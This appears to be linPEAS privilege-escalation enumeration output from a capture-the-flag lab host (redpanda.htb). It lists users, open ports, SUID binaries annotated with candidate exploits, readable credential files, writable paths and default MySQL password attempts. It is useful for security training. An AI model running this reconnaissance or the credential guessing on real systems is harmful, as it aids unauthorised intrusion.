org.freedesktop.UDisks2 739 udisksd root :1.5 udisks2.service - -
org.freedesktop.UPower - - - (activatable) - - -
org.freedesktop.bolt - - - (activatable) - - -
org.freedesktop.fwupd - - - (activatable) - - -
org.freedesktop.hostname1 - - - (activatable) - - -
org.freedesktop.locale1 - - - (activatable) - - -
org.freedesktop.login1 738 systemd-logind root :1.7 systemd-logind.service - -
org.freedesktop.network1 - - - (activatable) - - -
org.freedesktop.resolve1 1090 systemd-resolve systemd-resolve :1.9 systemd-resolved.service - -
org.freedesktop.systemd1 1 systemd root :1.4 init.scope - -
org.freedesktop.thermald - - - (activatable) - - -
org.freedesktop.timedate1 - - - (activatable) - - -
org.freedesktop.timesync1 638 systemd-timesyn systemd-timesync :1.0 systemd-timesyncd.service - -
╔═════════════════════╗
════════════════════════════════════════╣ Network Information ╠════════════════════════════════════════
╚═════════════════════╝
╔══════════╣ Hostname, hosts and DNS
redpanda
127.0.0.1 localhost redpanda.htb
127.0.1.1 redpanda
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
nameserver 127.0.0.53
options edns0 trust-ad
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.170 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 fe80::250:56ff:feb9:f29 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:f29 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:0f:29 txqueuelen 1000 (Ethernet)
RX packets 195187 bytes 23219352 (23.2 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 129002 bytes 16878815 (16.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 17246 bytes 2153061 (2.1 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 17246 bytes 2153061 (2.1 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN 883/java
╔══════════╣ Can I sniff with tcpdump?
No
╔═══════════════════╗
═════════════════════════════════════════╣ Users Information ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ My user
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#users
uid=1000(woodenk) gid=1001(logs) groups=1001(logs),1000(woodenk)
╔══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens
ptrace protection is enabled (1)
gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it
╔══════════╣ Checking Pkexec policy
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin
╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash
╔══════════╣ Users with console
root:x:0:0:root:/root:/bin/bash
woodenk:x:1000:1000:,,,:/home/woodenk:/bin/bash
╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=1000(woodenk) gid=1000(woodenk) groups=1000(woodenk)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(systemd-timesync) gid=104(systemd-timesync) groups=104(systemd-timesync)
uid=103(messagebus) gid=106(messagebus) groups=106(messagebus)
uid=104(syslog) gid=110(syslog) groups=110(syslog),4(adm),5(tty)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(tss) gid=111(tss) groups=111(tss)
uid=107(uuidd) gid=112(uuidd) groups=112(uuidd)
uid=108(tcpdump) gid=113(tcpdump) groups=113(tcpdump)
uid=109(landscape) gid=115(landscape) groups=115(landscape)
uid=110(pollinate) gid=1(daemon[0m) groups=1(daemon[0m)
uid=111(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=112(usbmux) gid=46(plugdev) groups=46(plugdev)
uid=113(mysql) gid=118(mysql) groups=118(mysql)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=998(lxd) gid=100(users) groups=100(users)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
╔══════════╣ Login now
11:32:52 up 2:31, 0 users, load average: 0.13, 0.06, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
╔══════════╣ Last logons
woodenk pts/2 Mon Sep 12 09:30:06 2022 - Mon Sep 12 09:34:31 2022 (00:04) 10.10.16.9
woodenk pts/1 Mon Sep 12 09:28:47 2022 - Mon Sep 12 09:34:31 2022 (00:05) 10.10.16.9
reboot system boot Mon Sep 12 09:00:57 2022 still running 0.0.0.0
woodenk pts/0 Tue Jul 5 05:51:25 2022 - Tue Jul 5 05:53:14 2022 (00:01) 10.10.14.23
reboot system boot Tue Jul 5 05:49:47 2022 - Tue Jul 5 05:53:16 2022 (00:03) 0.0.0.0
root tty1 Thu Jun 30 13:17:41 2022 - down (00:00) 0.0.0.0
reboot system boot Thu Jun 30 13:17:15 2022 - Thu Jun 30 13:18:04 2022 (00:00) 0.0.0.0
wtmp begins Thu Jun 30 13:17:15 2022
╔══════════╣ Last time logon each user
Username Port From Latest
root tty1 Thu Jun 30 13:17:41 +0000 2022
woodenk pts/2 10.10.16.9 Mon Sep 12 09:30:06 +0000 2022
╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
╔══════════════════════╗
═══════════════════════════════════════╣ Software Information ╠═══════════════════════════════════════
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/ping
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget
╔══════════╣ Installed Compilers
╔══════════╣ MySQL version
mysql Ver 8.0.29-0ubuntu0.20.04.3 for Linux on x86_64 ((Ubuntu))
═╣ MySQL connection using default root/root ........... No
═╣ MySQL connection using root/toor ................... No
═╣ MySQL connection using root/NOPASS ................. No
╔══════════╣ Searching mysql credentials and exec
From '/etc/mysql/mysql.conf.d/mysqld.cnf' Mysql user: user = mysql
Found readable /etc/mysql/my.cnf
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mysql.conf.d/
╔══════════╣ Analyzing MariaDB Files (limit 70)
-rw------- 1 root root 317 Jun 14 11:54 /etc/mysql/debian.cnf
╔══════════╣ Analyzing Rsync Files (limit 70)
-rw-r--r-- 1 root root 1044 Feb 7 2022 /usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
comment = public archive
path = /var/www/pub
use chroot = yes
lock file = /var/lock/rsyncd
read only = yes
list = yes
uid = nobody
gid = nogroup
strict modes = yes
ignore errors = no
ignore nonreadable = yes
transfer logging = no
timeout = 600
refuse options = checksum dry-run
dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz
╔══════════╣ Analyzing Ldap Files (limit 70)
The password hash is from the {SSHA} to 'structural'
drwxr-xr-x 2 root root 4096 Jun 14 14:35 /etc/ldap
╔══════════╣ Searching ssl/ssh files
PermitRootLogin yes
ChallengeResponseAuthentication no
UsePAM yes
PasswordAuthentication yes
══╣ Some certificates were found (out limited):
/etc/pki/fwupd-metadata/LVFS-CA.pem
/etc/pki/fwupd/LVFS-CA.pem
/etc/pollinate/entropy.ubuntu.com.pem
/var/lib/fwupd/pki/client.pem
7178PSTORAGE_CERTSBIN
gpg-connect-agent: no running gpg-agent - starting '/usr/bin/gpg-agent'
gpg-connect-agent: waiting for the agent to come up ... (5s)
gpg-connect-agent: connection to agent established
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config
Include /etc/ssh/sshd_config.d/*.conf
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem sftp /usr/lib/openssh/sftp-server
══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow
Searching inside /etc/ssh/ssh_config for interesting info
Include /etc/ssh/ssh_config.d/*.conf
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 2 root root 4096 Jun 14 14:35 /etc/pam.d
-rw-r--r-- 1 root root 2133 Feb 26 2020 /etc/pam.d/sshd
╔══════════╣ Searching tmux sessions
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions
tmux 3.0a
/tmp/tmux-1000
╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 Jul 5 05:52 /usr/share/keyrings
╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
-rw-r--r-- 1 root root 2796 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
-rw-r--r-- 1 root root 2794 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
-rw-r--r-- 1 root root 1733 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
-rw-r--r-- 1 root root 3267 Jan 6 2021 /usr/share/gnupg/distsigkey.gpg
-rw-r--r-- 1 root root 2247 Apr 1 13:27 /usr/share/keyrings/ubuntu-advantage-cc-eal.gpg
-rw-r--r-- 1 root root 2274 Jan 25 2021 /usr/share/keyrings/ubuntu-advantage-cis.gpg
-rw-r--r-- 1 root root 2236 Oct 15 2020 /usr/share/keyrings/ubuntu-advantage-esm-apps.gpg
-rw-r--r-- 1 root root 2264 Oct 15 2020 /usr/share/keyrings/ubuntu-advantage-esm-infra-trusty.gpg
-rw-r--r-- 1 root root 2275 Oct 15 2020 /usr/share/keyrings/ubuntu-advantage-fips.gpg
-rw-r--r-- 1 root root 2250 Apr 15 14:10 /usr/share/keyrings/ubuntu-advantage-realtime-kernel.gpg
-rw-r--r-- 1 root root 2235 Apr 1 13:27 /usr/share/keyrings/ubuntu-advantage-ros.gpg
-rw-r--r-- 1 root root 7399 Sep 17 2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg
-rw-r--r-- 1 root root 6713 Oct 27 2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg
-rw-r--r-- 1 root root 4097 Feb 6 2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg
-rw-r--r-- 1 root root 0 Jan 17 2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg
-rw-r--r-- 1 root root 1227 May 27 2010 /usr/share/keyrings/ubuntu-master-keyring.gpg
-rw-r--r-- 1 root root 2867 Feb 13 2020 /usr/share/popularity-contest/debian-popcon.gpg
╔══════════╣ Analyzing Cache Vi Files (limit 70)
-rw-r--r-- 1 root root 12288 Jun 20 14:05 /opt/panda_search/target/classes/static/css/.main.css.swp
-rw-r--r-- 1 root root 12288 Apr 26 11:33 /opt/panda_search/target/classes/templates/.search.html.swp
-rw-r--r-- 1 root root 12288 Apr 25 09:28 /opt/panda_search/target/classes/templates/.stats.html.swp
╔══════════╣ Kubernetes information
╔══════════╣ Analyzing Bind Files (limit 70)
-rw-r--r-- 1 root root 832 Feb 2 2020 /usr/share/bash-completion/completions/bind
-rw-r--r-- 1 root root 832 Feb 2 2020 /usr/share/bash-completion/completions/bind
╔══════════╣ Analyzing Windows Files Files (limit 70)
lrwxrwxrwx 1 root root 20 Jun 14 11:54 /etc/alternatives/my.cnf -> /etc/mysql/mysql.cnf
lrwxrwxrwx 1 root root 24 Jun 14 11:54 /etc/mysql/my.cnf -> /etc/alternatives/my.cnf
-rw-r--r-- 1 root root 81 Jun 14 11:54 /var/lib/dpkg/alternatives/my.cnf
╔══════════╣ Analyzing Other Interesting Files Files (limit 70)
-rw-r--r-- 1 root root 3771 Feb 25 2020 /etc/skel/.bashrc
-rw-r--r-- 1 woodenk woodenk 3938 Jun 14 12:37 /home/woodenk/.bashrc
-rw-r--r-- 1 root root 807 Feb 25 2020 /etc/skel/.profile
-rw-r--r-- 1 woodenk woodenk 807 Jun 14 11:12 /home/woodenk/.profile
╔═══════════════════╗
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strings Not Found
-rwsr-xr-- 1 root messagebus 51K Apr 29 12:03 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 23K Feb 21 2022 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 463K Mar 30 13:03 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 55K Feb 7 2022 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 163K Jan 19 2021 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 87K Mar 14 08:26 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39K Feb 7 2022 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 67K Mar 14 08:26 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 52K Mar 14 08:26 /usr/bin/chsh
-rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 84K Mar 14 08:26 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 14 08:26 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 67K Feb 7 2022 /usr/bin/su
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root shadow 43K Sep 17 2021 /usr/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 43K Sep 17 2021 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root utmp 15K Sep 30 2019 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root tty 35K Feb 7 2022 /usr/bin/wall
-rwxr-sr-x 1 root ssh 343K Mar 30 13:03 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 31K Mar 14 08:26 /usr/bin/expiry
-rwxr-sr-x 1 root tty 15K Mar 30 2020 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 83K Mar 14 08:26 /usr/bin/chage
-rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwxr-sr-x 1 root crontab 43K Feb 13 2020 /usr/bin/crontab
╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so
/etc/ld.so.conf
include /etc/ld.so.conf.d/*.conf
/etc/ld.so.conf.d
/etc/ld.so.conf.d/libc.conf
/usr/local/lib
/etc/ld.so.conf.d/x86_64-linux-gnu.conf
/usr/local/lib/x86_64-linux-gnu
/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu
╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
Current capabilities:
Current: =
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
Shell capabilities:
0x0000000000000000=
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
Files with capabilities (limited to 50):
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
╔══════════╣ Users with capabilities
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls
files with acls in searched folders Not Found
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh
/usr/bin/rescan-scsi-bus.sh
╔══════════╣ Unexpected in root
/credits
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files
total 32
drwxr-xr-x 2 root root 4096 Jun 14 14:35 .
drwxr-xr-x 105 root root 4096 Jul 5 05:52 ..
-rw-r--r-- 1 root root 96 Dec 5 2019 01-locale-fix.sh
-rw-r--r-- 1 root root 1557 Feb 17 2020 Z97-byobu.sh
-rw-r--r-- 1 root root 729 Feb 2 2020 bash_completion.sh
-rw-r--r-- 1 root root 1003 Aug 13 2019 cedilla-portuguese.sh
-rw-r--r-- 1 root root 1107 Nov 3 2019 gawk.csh
-rw-r--r-- 1 root root 757 Nov 3 2019 gawk.sh
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/home/woodenk/.bash_history
/home/woodenk/user.txt
/root/
╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
/home/woodenk
╔══════════╣ Readable files belonging to root and readable by me but not world readable
-rw-r----- 1 root logs 422 Sep 12 10:42 /credits/damian_creds.xml
-rw-r----- 1 root logs 426 Sep 12 10:54 /credits/woodenk_creds.xml
-rw-r----- 1 root woodenk 33 Sep 12 09:01 /home/woodenk/user.txt
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/opt/panda_search/redpanda.log
/tmp/hsperfdata_woodenk/883
/home/woodenk/.gnupg/pubring.kbx
/home/woodenk/.gnupg/trustdb.gpg
/var/log/syslog
/var/log/journal/8e7b2e7692df48faa4e42d6cfc791ed2/system.journal
/var/log/journal/8e7b2e7692df48faa4e42d6cfc791ed2/user-1000.journal
/var/log/auth.log
╔══════════╣ Writable log files (logrotten) (limit 100)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation
logrotate 3.14.0
Default mail command: /usr/bin/mail
Default compress command: /bin/gzip
Default uncompress command: /bin/gunzip
Default compress extension: .gz
Default state file path: /var/lib/logrotate/status
ACL support: yes
SELinux support: yes
╔══════════╣ Files inside /home/woodenk (limit 20)
total 796
drwxr-xr-x 6 woodenk woodenk 4096 Sep 12 11:32 .
drwxr-xr-x 3 root root 4096 Jun 14 14:35 ..
lrwxrwxrwx 1 root root 9 Jun 14 11:38 .bash_history -> /dev/null
-rw-r--r-- 1 woodenk woodenk 220 Jun 14 11:12 .bash_logout
-rw-r--r-- 1 woodenk woodenk 3938 Jun 14 12:37 .bashrc
drwx------ 2 woodenk woodenk 4096 Jun 23 19:04 .cache
drwx------ 3 woodenk logs 4096 Sep 12 11:32 .gnupg
drwxrwxr-x 3 woodenk woodenk 4096 Jun 14 14:35 .local
drwxrwxr-x 4 woodenk woodenk 4096 Jun 14 14:35 .m2
-rw-r--r-- 1 woodenk woodenk 807 Jun 14 11:12 .profile
-rwxrw-r-- 1 woodenk logs 770491 Jul 1 10:40 linpeas.sh
-rw-r----- 1 root woodenk 33 Sep 12 09:01 user.txt
╔══════════╣ Files inside others home (limit 20)
╔══════════╣ Searching installed mail applications
╔══════════╣ Mails (limit 50)
╔══════════╣ Backup folders
╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 3696 Jun 20 15:58 /opt/credit-score/LogParser/final/pom.xml.bak
-rwxr-xr-x 1 root root 226 Feb 17 2020 /usr/share/byobu/desktop/byobu.desktop.old
-rw-r--r-- 1 root root 392817 Feb 9 2020 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 7867 Jul 16 1996 /usr/share/doc/telnet/README.old.gz
-rw-r--r-- 1 root root 11886 Jun 14 12:58 /usr/share/info/dir.old
-rw-r--r-- 1 root root 2756 Feb 13 2020 /usr/share/man/man8/vgcfgbackup.8.gz
-rw-r--r-- 1 root root 0 Jun 15 13:13 /usr/src/linux-headers-5.4.0-121-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 0 Jun 15 13:13 /usr/src/linux-headers-5.4.0-121-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 237986 Jun 15 13:13 /usr/src/linux-headers-5.4.0-121-generic/.config.old
-rwxr-xr-x 1 root root 1086 Nov 25 2019 /usr/src/linux-headers-5.4.0-121/tools/testing/selftests/net/tcp_fastopen_backup_key.sh
-rw-r--r-- 1 root root 44048 Oct 12 2021 /usr/lib/x86_64-linux-gnu/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rw-r--r-- 1 root root 9833 Jun 15 13:13 /usr/lib/modules/5.4.0-121-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 9073 Jun 15 13:13 /usr/lib/modules/5.4.0-121-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 1802 Feb 15 2022 /usr/lib/python3/dist-packages/sos/report/plugins/ovirt_engine_backup.py
-rw-r--r-- 1 root root 1413 Jun 14 12:58 /usr/lib/python3/dist-packages/sos/report/plugins/__pycache__/ovirt_engine_backup.cpython-38.pyc
-rw-r--r-- 1 root root 39448 May 4 12:36 /usr/lib/mysql/plugin/component_mysqlbackup.so
-rw-r--r-- 1 root root 2743 Apr 23 2020 /etc/apt/sources.list.curtin.old
╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found: /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3031001
Found: /var/lib/command-not-found/commands.db: SQLite 3.x database, last written using SQLite version 3031001
Found: /var/lib/fwupd/pending.db: SQLite 3.x database, last written using SQLite version 3031001
-> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20)
-> Extracting tables from /var/lib/command-not-found/commands.db (limit 20)
-> Extracting tables from /var/lib/fwupd/pending.db (limit 20)
╔══════════╣ Web files?(output limit)
╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-rw-r-- 1 root root 6148 Dec 14 2021 /opt/panda_search/src/main/resources/static/.DS_Store
-rw-rw-r-- 1 root root 6148 Dec 14 2021 /opt/panda_search/src/main/resources/static/img/.DS_Store
-rw-rw-r-- 1 root root 6148 Dec 14 2021 /opt/panda_search/src/main/resources/.DS_Store
-rw-rw-r-- 1 root root 6148 Dec 14 2021 /opt/panda_search/src/main/resources/templates/.DS_Store
-rw-rw-r-- 1 root root 6148 Dec 14 2021 /opt/panda_search/src/main/.DS_Store
-rw-r--r-- 1 root root 2047 Apr 23 13:02 /usr/lib/jvm/.java-1.11.0-openjdk-amd64.jinfo
-rw-r--r-- 1 woodenk woodenk 220 Jun 14 11:12 /home/woodenk/.bash_logout
-rw-r--r-- 1 root root 220 Feb 25 2020 /etc/skel/.bash_logout
-rw------- 1 root root 0 Apr 23 2020 /etc/.pwd.lock
-rw-r--r-- 1 root root 0 Jun 14 12:04 /etc/.java/.systemPrefs/.system.lock
-rw-r--r-- 1 root root 0 Jun 14 12:04 /etc/.java/.systemPrefs/.systemRootModFile
-rw-r--r-- 1 landscape landscape 0 Apr 23 2020 /var/lib/landscape/.cleanup.user
-rw-r--r-- 1 root root 0 Sep 12 09:01 /run/network/.ifstate.lock
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rwxrwxr-x 1 woodenk logs 765823 Sep 12 11:29 /tmp/hsperfdata_woodenk/linpeas.sh
-rw------- 1 woodenk logs 32768 Sep 12 11:32 /tmp/hsperfdata_woodenk/883
-rw-r--r-- 1 root root 39509 Jul 5 05:52 /var/backups/apt.extended_states.0
-rw-r--r-- 1 root root 4206 Jun 14 14:30 /var/backups/apt.extended_states.1.gz
-rw-r--r-- 1 root root 677272 Jun 14 14:30 /var/backups/dpkg.status.0
-rw-r--r-- 1 root root 268 May 7 2020 /var/backups/dpkg.diversions.0
-rw-r--r-- 1 root root 81920 Jun 17 06:25 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 100 Apr 23 2020 /var/backups/dpkg.statoverride.0
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/woodenk
/opt/panda_search/src/main/resources/static/css/panda.css
/opt/panda_search/target/classes/static/css/panda.css
/opt/panda_search/target/panda.css.map
/run/lock
/run/screen
/tmp
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/tmp/.font-unix
#)You_can_write_even_more_files_inside_last_directory
/tmp/hsperfdata_woodenk/883
/tmp/hsperfdata_woodenk/linpeas.sh
/tmp/tmux-1000
/tmp/tomcat-docbase.8080.3786991954686091370
/tmp/tomcat.8080.1605307941942746866
/tmp/tomcat.8080.1605307941942746866/work
/tmp/tomcat.8080.1605307941942746866/work/Tomcat
/tmp/tomcat.8080.1605307941942746866/work/Tomcat/localhost
/tmp/tomcat.8080.1605307941942746866/work/Tomcat/localhost/ROOT
/var/crash
/var/tmp
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
Group logs:
/opt/panda_search/redpanda.log
/tmp/hsperfdata_woodenk/linpeas.sh
/tmp/tomcat.8080.1605307941942746866/work
/tmp/tomcat.8080.1605307941942746866/work/Tomcat
/tmp/tomcat.8080.1605307941942746866/work/Tomcat/localhost
/tmp/tomcat.8080.1605307941942746866/work/Tomcat/localhost/ROOT
╔══════════╣ Searching passwords in history files
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/pam.d/common-password
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/lib/git-core/git-credential
/usr/lib/git-core/git-credential-cache
/usr/lib/git-core/git-credential-cache--daemon
/usr/lib/git-core/git-credential-store
#)There are more creds/passwds files in the previous parent folder
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/mysql/plugin/component_validate_password.so
/usr/lib/mysql/plugin/validate_password.so
/usr/lib/python3/dist-packages/keyring/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/keyring/credentials.py
/usr/lib/python3/dist-packages/launchpadlib/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/launchpadlib/credentials.py
/usr/lib/python3/dist-packages/launchpadlib/tests/__pycache__/test_credential_store.cpython-38.pyc
/usr/lib/python3/dist-packages/launchpadlib/tests/test_credential_store.py
